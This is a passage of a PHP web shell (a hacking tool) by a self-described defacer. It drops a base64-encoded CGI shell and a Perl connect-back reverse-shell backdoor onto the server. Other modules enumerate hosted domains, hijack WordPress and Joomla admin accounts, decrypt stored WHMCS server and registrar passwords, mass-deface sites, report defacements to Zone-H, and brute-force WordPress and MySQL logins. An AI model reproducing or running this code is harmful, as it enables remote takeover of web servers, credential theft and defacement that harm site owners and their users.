ZmF1bHQKCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQKJEN1cnJlbnREaXIgPSAkaW57J2QnfTsKY2hvcCgkQ3VycmVudERpciA9IGAkQ21kUHdkYCkgaWYoJEN1cnJlbnREaXIgZXEgIiIpOwoKJExvZ2dlZEluID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOwoKaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pICMgdXNlciBuZWVkcy9oYXMgdG8gbG9naW4KewoJJlBlcmZvcm1Mb2dpbjsKfQplbHNpZigkQWN0aW9uIGVxICJjb21tYW5kIikgIyB1c2VyIHdhbnRzIHRvIHJ1biBhIGNvbW1hbmQKewoJJkV4ZWN1dGVDb21tYW5kOwp9CmVsc2lmKCRBY3Rpb24gZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlCnsKCSZVcGxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImRvd25sb2FkIikgIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQp7CgkmRG93bmxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImxvZ291dCIpICMgdXNlciB3YW50cyB0byBsb2dvdXQKewoJJlBlcmZvcm1Mb2dvdXQ7Cn0K';
  2098.  
  2099. $file = fopen("izo.cin" ,"w+");
  2100. $write = fwrite ($file ,base64_decode($cgishellizocin));
  2101. fclose($file);
  2102.     chmod("izo.cin",0755);
  2103. $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
  2104. MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
  2105. ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
  2106. MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
  2107. ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
  2108. MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
  2109. Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
  2110. KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
  2111. SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
  2112. ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
  2113. UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
  2114. VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
  2115. ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
  2116. JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
  2117. bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
  2118. ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
  2119. YXRhY2hlZFxuXG4iOw==';
  2120.  
  2121. $file = fopen("dc.pl" ,"w+");
  2122. $write = fwrite ($file ,base64_decode($netcatshell));
  2123. fclose($file);
  2124.     chmod("dc.pl",0755);
  2125.    echo "<iframe src=cgitelnet1/izo.cin width=96% height=90% frameborder=0></iframe>
  2126.  
  2127.  
  2128.  </div>"; }
  2129. ////////////////////////////////////////////////////////
  2130. elseif(isset($_GET['x']) && ($_GET['x'] == 'domain'))
  2131. {      
  2132. ?>
  2133. <form action="?y=<?php echo $pwd; ?>&amp;x=domain" method="post">
  2134.  
  2135. <?php
  2136.  
  2137. echo '<br><br><center><h1>Local Domain Viewer</h1></center><br><br><div class=content>';
  2138.  
  2139. $file = @implode(@file("/etc/named.conf"));
  2140. if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
  2141. preg_match_all("#named/(.*?).db#",$file ,$r);
  2142. $domains = array_unique($r[1]);
  2143. //check();
  2144. //if(isset($_GET['ShowAll']))
  2145. {
  2146. echo "<table align=center border=1 width=59% cellpadding=5>
  2147. <tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
  2148. <tr><td>Domain</td><td>User</td></tr>";
  2149. foreach($domains as $domain){
  2150. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  2151.  
  2152.                 echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
  2153.                 }
  2154.         echo "</table>";
  2155.         }
  2156.  
  2157. echo '</div>';
  2158. }
  2159. ////////////////////////////////////////////////////
  2160. elseif(isset($_GET['x']) && ($_GET['x'] == 'wp-reset'))
  2161. {      
  2162. ?>
  2163. <form action="?y=<?php echo $pwd; ?>&amp;x=wp-reset" method="post">
  2164.  
  2165. <?php
  2166.  
  2167. echo "<center/><br/><b><font color=#00ff00>Wordpress Reset Password</font></b><br><br>";
  2168.  
  2169.   if(empty($_POST['pwd'])){
  2170.  
  2171. echo "<FORM method='POST'>
  2172. <table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Hostname</td><td>
  2173. <input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
  2174. <input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
  2175. <input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
  2176. <input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
  2177. <tr><td>&nbsp;&nbsp;User baru</td><td>
  2178. <input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
  2179.  <tr><td>&nbsp;&nbsp;Pass Baru</td><td>
  2180. <input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />&nbsp;
  2181.  
  2182. <input style='width:19%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
  2183. </td></tr> </table><br><br><br><br>
  2184. ";
  2185. }else{
  2186. $localhost = $_POST['localhost'];
  2187. $database  = $_POST['database'];
  2188. $username  = $_POST['username'];
  2189. $password  = $_POST['password'];
  2190. $pwd   = $_POST['pwd'];
  2191. $admin = $_POST['admin'];
  2192.  
  2193.  
  2194.  @mysql_connect($localhost,$username,$password) or die(mysql_error());
  2195.  @mysql_select_db($database) or die(mysql_error());
  2196.  
  2197. $hash = crypt($pwd);
  2198. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
  2199. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
  2200. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
  2201. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
  2202. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
  2203. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
  2204. $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
  2205.  
  2206.  
  2207. if($a4s){
  2208. echo "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";
  2209. }
  2210.  
  2211. }
  2212.  
  2213.  
  2214.   echo "
  2215.    </div>"; }
  2216. /////////////////////////////////////////////////////
  2217. elseif(isset($_GET['x']) && ($_GET['x'] == 'jm-reset'))
  2218. {      
  2219. ?>
  2220. <form action="?y=<?php echo $pwd; ?>&amp;x=jm-reset" method="post">
  2221.  
  2222. <?php
  2223.  
  2224. echo "<center/><br/><b><font color=#00ff00>+--==[  Joomla Reset Password ]==--+</font></b><br><br>";
  2225.         if(empty($_POST['pwd'])){
  2226. echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  2227. <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
  2228. <input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
  2229. <input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
  2230. <input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
  2231. <tr><td>&nbsp;&nbsp;User baru</td><td>
  2232. <input style='width:270px;' class='inputz' name='admin' value='admin' /></td></tr>
  2233.  <tr><td>&nbsp;&nbsp;pass baru </td><td>123456 =
  2234. <input style='width:130px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />&nbsp;
  2235.  
  2236. <input style='width:23%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
  2237. </td></tr> </table><br><br><br><br>
  2238. ";
  2239. }else{
  2240. $localhost = $_POST['localhost'];
  2241. $database  = $_POST['database'];
  2242. $username  = $_POST['username'];
  2243. $password  = $_POST['password'];
  2244. $pwd   = $_POST['pwd'];
  2245. $admin = $_POST['admin'];
  2246. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  2247. @mysql_select_db($database) or die(mysql_error());
  2248. $hash = crypt($pwd);
  2249. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
  2250. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
  2251. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
  2252. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
  2253. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
  2254. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
  2255. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
  2256. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
  2257. if($SQL){
  2258. echo "<b>Success : skarang password barunya >>> - (123456)";
  2259. }
  2260. }
  2261.        
  2262.   echo "
  2263.    </div>";
  2264. }
  2265. /////////////////////////////////////////////
  2266. elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs'))
  2267. {      
  2268. ?>
  2269. <form action="?y=<?php echo $pwd; ?>&amp;x=whmcs" method="post">
  2270.  
  2271. <?php
  2272.  
  2273. function decrypt ($string,$cc_encryption_hash)
  2274. {
  2275.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  2276.     $hash_key = _hash ($key);
  2277.     $hash_length = strlen ($hash_key);
  2278.     $string = base64_decode ($string);
  2279.     $tmp_iv = substr ($string, 0, $hash_length);
  2280.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  2281.     $iv = $out = ';
  2282.     $c = 0;
  2283.     while ($c < $hash_length)
  2284.     {
  2285.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  2286.         ++$c;
  2287.     }
  2288.     $key = $iv;
  2289.     $c = 0;
  2290.     while ($c < strlen ($string))
  2291.     {
  2292.         if (($c != 0 AND $c % $hash_length == 0))
  2293.         {
  2294.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  2295.         }
  2296.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  2297.         ++$c;
  2298.     }
  2299.     return $out;
  2300. }
  2301.  
  2302. function _hash ($string)
  2303. {
  2304.     if (function_exists ('sha1'))
  2305.     {
  2306.         $hash = sha1 ($string);
  2307.     }
  2308.     else
  2309.     {
  2310.         $hash = md5 ($string);
  2311.     }
  2312.     $out = ';
  2313.     $c = 0;
  2314.     while ($c < strlen ($hash))
  2315.     {
  2316.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  2317.         $c += 2;
  2318.     }
  2319.     return $out;
  2320. }
  2321.  
  2322. echo "
  2323. <br><center><font size='5' color='#00ff00'><b>-=[ WHMCS Decoder ]=-</b></font></center>
  2324. <center>
  2325. <br>
  2326.  
  2327. <FORM action='  method='post'>
  2328. <input type='hidden' name='form_action' value='2'>
  2329. <br>
  2330. <table class=tabnet style=width:320px;padding:0 1px;>
  2331. <tr><th colspan=2>WHMCS Decoder</th></tr>
  2332. <tr><td>db_host </td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
  2333. <tr><td>db_username </td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_username' value='></td></tr>
  2334. <tr><td>db_password</td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_password' value='></td></tr>
  2335. <tr><td>db_name</td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_name' value='></td></tr>
  2336. <tr><td>cc_encryption_hash</td><td><input style='color:#00ff00;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value='></td></tr>
  2337. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#00ff00;background-color:'  value='Submit' name='Submit'></td>
  2338. </table>
  2339. </FORM>
  2340. </center>
  2341. ";
  2342.  
  2343.  if($_POST['form_action'] == 2 )
  2344.  {
  2345.  //include($file);
  2346.  $db_host=($_POST['db_host']);
  2347.  $db_username=($_POST['db_username']);
  2348.  $db_password=($_POST['db_password']);
  2349.  $db_name=($_POST['db_name']);
  2350.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
  2351.  
  2352.  
  2353.  
  2354.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  2355.         mysql_select_db($db_name,$link) ;
  2356. $query = mysql_query("SELECT * FROM tblservers");
  2357. while($v = mysql_fetch_array($query)) {
  2358. $ipaddress = $v['ipaddress'];
  2359. $username = $v['username'];
  2360. $type = $v['type'];
  2361. $active = $v['active'];
  2362. $hostname = $v['hostname'];
  2363. echo("<center><table border='1'>");
  2364. $password = decrypt ($v['password'], $cc_encryption_hash);
  2365. echo("<tr><td>Type</td><td>$type</td></tr>");
  2366. echo("<tr><td>Active</td><td>$active</td></tr>");
  2367. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  2368. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  2369. echo("<tr><td>Username</td><td>$username</td></tr>");
  2370. echo("<tr><td>Password</td><td>$password</td></tr>");
  2371.  
  2372. echo "</table><br><br></center>";
  2373. }
  2374.  
  2375.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  2376.         mysql_select_db($db_name,$link) ;
  2377. $query = mysql_query("SELECT * FROM tblregistrars");
  2378. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
  2379. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  2380. while($v = mysql_fetch_array($query)) {
  2381. $registrar     = $v['registrar'];
  2382. $setting = $v['setting'];
  2383. $value = decrypt ($v['value'], $cc_encryption_hash);
  2384. if ($value=="") {
  2385. $value=0;
  2386. }
  2387. $password = decrypt ($v['password'], $cc_encryption_hash);
  2388. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  2389. }
  2390. }
  2391. }
  2392. /////////////////////////////////////////////////////////////////
  2393. elseif(isset($_GET['x']) && ($_GET['x'] == 'zone'))
  2394. {      
  2395. ?>
  2396. <form action="?y=<?php echo $pwd; ?>&amp;x=zone" method="post">
  2397.  
  2398. <br><br><center>
  2399. <!-- Zone-H -->
  2400. <form action="" method='POST'><table><table class='tabnet'><tr>
  2401. <td style='background-color:#0000;padding-left:10px;'><tr><tr><th colspan="2"><h2>Zone-H Defacer</h2></th></tr></td></tr><tr><td height='45' colspan='2'><form method="post">
  2402. <input type="text" class="inputz" name="defacer" value="Nabilaholic404" />
  2403. <select name="hackmode" class="inputz" >
  2404. <option >------------------------Pilih Salah Satu------------------------</option>
  2405. <option value="1">known vulnerability (i.e. unpatched system)</option>
  2406. <option value="2" >undisclosed (new) vulnerability</option>
  2407. <option value="3" >configuration / admin. mistake</option>
  2408. <option value="4" >brute force attack</option>
  2409. <option value="5" >social engineering</option>
  2410. <option value="6" >Web Server intrusion</option>
  2411. <option value="7" >Web Server external module intrusion</option>
  2412. <option value="8" >Mail Server intrusion</option>
  2413. <option value="9" >FTP Server intrusion</option>
  2414. <option value="10" >SSH Server intrusion</option>
  2415. <option value="11" >Telnet Server intrusion</option>
  2416. <option value="12" >RPC Server intrusion</option>
  2417. <option value="13" >Shares misconfiguration</option>
  2418. <option value="14" >Other Server intrusion</option>
  2419. <option value="15" >SQL Injection</option>
  2420. <option value="16" >URL Poisoning</option>
  2421. <option value="17" >File Inclusion</option>
  2422. <option value="18" >Other Web Application bug</option>
  2423. <option value="19" >Remote administrative panel access bruteforcing</option>
  2424. <option value="20" >Remote administrative panel access password guessing</option>
  2425. <option value="21" >Remote administrative panel access social engineering</option>
  2426. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
  2427. <option value="23" >Access credentials through Man In the Middle attack</option>
  2428. <option value="24" >Remote service password guessing</option>
  2429. <option value="25" >Remote service password bruteforce</option>
  2430. <option value="26" >Rerouting after attacking the Firewall</option>
  2431. <option value="27" >Rerouting after attacking the Router</option>
  2432. <option value="28" >DNS attack through social engineering</option>
  2433. <option value="29" >DNS attack through cache poisoning</option>
  2434. <option value="30" >Not available</option>
  2435. </select>
  2436.  
  2437. <select name="reason" class="inputz" >
  2438. <option >-------------Pilih Salah Satu---------------</option>
  2439. <option value="1" >Heh...just for fun!</option>
  2440. <option value="2" >Revenge against that website</option>
  2441. <option value="3" >Political reasons</option>
  2442. <option value="4" >As a challenge</option>
  2443. <option value="5" >I just want to be the best defacer</option>
  2444. <option value="6" >Patriotism</option>
  2445. <option value="7" >Not available</option>
  2446. </select>
  2447. <input type="hidden" name="action" value="zone">
  2448. <center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains">List Of Domains</textarea>
  2449. <br /><input class='inputzbut' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>
  2450. </form></td></tr></table></form>
  2451. <!-- End Of Zone-H -->
  2452. </td></center><br><br>
  2453.  
  2454. <?php
  2455. echo '<center>';
  2456.         ob_start();
  2457.         $sub = get_loaded_extensions();
  2458.         if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');}
  2459.         $hacker = $_POST['defacer'];
  2460.         $method = $_POST['hackmode'];
  2461.         $neden = $_POST['reason'];
  2462.         $site = $_POST['domain'];
  2463.        
  2464.         if (empty($hacker)){die ("[-] You Must Fill the Attacker name !");}
  2465.         elseif($method == "--------SELECT--------") {die("[-] You Must Select The Method !");}
  2466.         elseif($neden == "--------SELECT--------") {die("[-] You Must Select The Reason");}
  2467.         elseif(empty($site)) {die("[-] You Must Inter the Sites List ! ");}
  2468.         $i = 0;
  2469.         $sites = explode("\n", $site);
  2470.         while($i < count($sites))
  2471.         {
  2472.                 if(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];}
  2473.                 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
  2474.                 echo "Site : ".$sites[$i]." Defaced !\n";
  2475.                 ++$i;
  2476.         }
  2477.         echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
  2478.  
  2479.         echo '</center>';
  2480. }
  2481. //////////////////////////////////////////////////////
  2482. elseif(isset($_GET['x']) && ($_GET['x'] == 'mass'))
  2483. {
  2484. echo "<center/><br/><b><font color=#00ff00>-=[ Mass Deface ]=-</font></b><br>";
  2485. error_reporting(0);?>
  2486. <form ENCTYPE="multipart/form-data" action="<?php $_SERVER['PHP_SELF']?>" method='post'>
  2487. <td><table><table class="tabnet" >
  2488. <form hethot='post'>
  2489. <tr>
  2490.         <tr>
  2491.         <td>&nbsp;&nbsp;Folder</td><td><input class ='inputz' type='text' name='path' size='60' value="<?php echo getcwd();?>"></td>
  2492.         </tr><br>
  2493.         <tr>
  2494.         <td>file name</td><td><input class ='inputz' type='text' name='file' size='60' value="index.php"></td>
  2495.         </tr>
  2496. </tr>
  2497. <th colspan='2'><b>Index code</b></th><br></table>
  2498. <textarea style='background:black;outline:none;' name='index' rows='10' cols='67'><title>Nabilaholic Here !</title><br>Hacked by Nabilaholic404 - JKT48 CYBER TEAM</textarea><br>
  2499. <center><input class='inputzbut' type='submit' value="&nbsp;&nbsp;Deface&nbsp;&nbsp;"></center></form></table><br></form>
  2500.  
  2501. <?php $mainpath=$_POST[path];$file=$_POST[file];$dir=opendir("$mainpath");$code=base64_encode($_POST[index]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$finish=@fwrite($start,$indx);if ($finish){echo "$row/$file > Done<br><br>";}}}
  2502.  
  2503. ///////////////////////////////////////////////////
  2504. elseif(isset($_GET['x']) && ($_GET['x'] == 'wpbrute'))
  2505. {      
  2506. ?>
  2507. <form action="?y=<?php echo $pwd; ?>&amp;x=wpbrute" method="post">
  2508. <center>
  2509. <br><Br><b><font size='2' >WPBForce</font><br>
  2510. <form enctype="multipart/form-data" method="POST">
  2511.   <table width='624' border='0' class='tabnet' id='Box'>
  2512.   <tr><th colspan="5">Wordpress Brute Force</th></tr>
  2513.    
  2514.  
  2515.     <tr>
  2516.       <td >&nbsp;</td>
  2517.       <td ><p>Hosts:</p></td>
  2518.       <td ><p> Users:</p></td>
  2519.       <td ><p>Passwords:</p></td>
  2520.     </tr>
  2521.     <tr>
  2522.       <td>&nbsp;</td>
  2523.       <td ><textarea style="background:black;" name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td>
  2524.       <td ><textarea style="background:black;" name="usernames" cols="30" rows="10"  ><?php if($_POST){echo $_POST['usernames'];}else {echo "admin";} ?></textarea></td>
  2525.       <td ><textarea style="background:black;" name="passwords" cols="30" rows="10"  ><?php if($_POST){echo $_POST['passwords'];}else {echo "List Passwd here";} ?></textarea></td>
  2526.     </tr>
  2527. <tr><td colspan="4"><input class='inputzbut' type="submit" name="submit" value="Brute Now"  />
  2528. <?php
  2529. if($_POST)
  2530. {
  2531.         $hosts = trim(filter($_POST['hosts']));
  2532.         $passwords = trim(filter($_POST['passwords']));
  2533.         $usernames = trim(filter($_POST['usernames']));
  2534.  
  2535.         if($passwords && $usernames && $hosts)
  2536.         {
  2537.                 $hosts_explode = explode("\n", $hosts);
  2538.                 $usernames_explode = explode("\n", $usernames);
  2539.         $passwords_explode = explode("\n", $passwords);
  2540.  
  2541.                 foreach($hosts_explode as $host)
  2542.                 {
  2543.                         $host = RemoveLastSlash($host);
  2544.                         $hacked = 0;
  2545.                         $host = str_replace(array("http://","https://","www."),"",trim($host));
  2546.                         $host = "http://".$host;
  2547.                         $wpAdmin = $host.'/wp-admin/';
  2548.  
  2549.                         if(!url_exists($host."/wp-login.php"))
  2550.                         {echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";ob_flush();flush();continue;}
  2551.  
  2552.                         foreach($usernames_explode as $username)
  2553.                         {
  2554.                                 foreach($passwords_explode as $password)
  2555.                                 {
  2556.                                         $ch   =     curl_init();
  2557.                                         curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2558.                                         curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php');
  2559.                                         curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
  2560.                                         curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
  2561.                                         curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
  2562.                                         curl_setopt($ch,CURLOPT_POST,TRUE);
  2563.                                         curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri&#8207;"."&redirect_to=".$wpAdmin."&testcookie=1");
  2564.                                         $login    =        curl_exec($ch);
  2565.  
  2566.                                         if(eregi ("profile.php",$login) )
  2567.                                         {
  2568.                                                 $hacked = 1;
  2569.                                                 echo "<p>".$host." => UserName : [<font color='green'>".$username."</font>] : Password : [<font color='green'>".$password."</font>]</p>";
  2570.                                                 ob_flush();flush();break;
  2571.                                         }
  2572.                                 }
  2573.                                 if($hacked == 1){break;}
  2574.                         }
  2575.                         if($hacked == 0)
  2576.                         {echo "<p>".$host." => <font color='red'>Gagal !</font></p>";ob_flush();flush();}
  2577.                 }
  2578.         }
  2579.         else {echo "<p><font color='red'>Semua kolom harus diisi ! </font></p>";}
  2580. }
  2581. ?>
  2582. </td></tr>
  2583. </table></form></center>
  2584. <?php
  2585.     curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
  2586. function url_exists($strURL)
  2587. {
  2588.     $resURL = curl_init();
  2589.     curl_setopt($resURL, CURLOPT_URL, $strURL);
  2590.     curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
  2591.     curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
  2592.     curl_exec ($resURL);
  2593.     $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
  2594.     curl_close ($resURL);
  2595.     if ($intReturnCode != 200){return false;}
  2596.         else{return true ;}
  2597. }
  2598. function filter($string)
  2599. {
  2600.         if(get_magic_quotes_gpc() != 0){return stripslashes($string);   }
  2601.         else{return $string;    }
  2602. }
  2603. function RemoveLastSlash($host)
  2604. {
  2605.         if(strrpos($host, '/', -1) == strlen($host)-1)
  2606.         {return substr($host,0,strrpos($host, '/', -1));}
  2607.         else{return $host;}
  2608. }
  2609. echo "</p>";
  2610. }
  2611.  
  2612.  
  2613. ////////////////////////////////////////////
  2614. elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
  2615.                         {      
  2616.                         ?>
  2617.                                 <form action="?y=<?php echo $pwd; ?>&amp;x=brute" method="post">
  2618.                         <?php
  2619.                         //bruteforce
  2620. ?>
  2621. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  2622. <?php
  2623. /*
  2624. Recoded By Nabilaholic
  2625. */
  2626. @set_time_limit(0);
  2627. @error_reporting(0);
  2628.  
  2629.  
  2630. if($_POST['page']=='find')
  2631. {
  2632. if(isset($_POST['usernames']) && isset($_POST['passwords']))
  2633. {
  2634.     if($_POST['type'] == 'passwd'){
  2635.         $e = explode("\n",$_POST['usernames']);
  2636.         foreach($e as $value){
  2637.         $k = explode(":",$value);
  2638.         $username .= $k['0']." ";
  2639.         }
  2640.     }elseif($_POST['type'] == 'simple'){
  2641.         $username = str_replace("\n",' ',$_POST['usernames']);
  2642.     }
  2643.     $a1 = explode(" ",$username);
  2644.     $a2 = explode("\n",$_POST['passwords']);
  2645.     $id2 = count($a2);
  2646.     $ok = 0;
  2647.     foreach($a1 as $user )
  2648.     {
  2649.         if($user !== ')
  2650.         {
  2651.         $user=trim($user);
  2652.          for($i=0;$i<=$id2;$i++)
  2653.          {
  2654.             $pass = trim($a2[$i]);
  2655.             if(@mysql_connect('localhost',$user,$pass))
  2656.             {
  2657.                 echo "Nabilaholic~ user is (<b><font color=white>$user</font></b>) Password is (<b><font color=red>$pass</font></b>)<br />";
  2658.                 $ok++;
  2659.             }
  2660.          }
  2661.         }
  2662.     }
  2663.     echo "<hr><b>You Found <font color=green>$ok</font> Cpanel by Nabilaholic</b>";
  2664.     echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  2665.     exit;
  2666. }
  2667. }
  2668. if($_POST['pass']=='password'){
  2669. @error_reporting(0);
  2670. $i = getenv('REMOTE_ADDR');
  2671. $d = date('D, M jS, Y H:i',time());
  2672. $h = $_SERVER['HTTP_HOST'];
  2673. $dir=$_SERVER['PHP_SELF'];
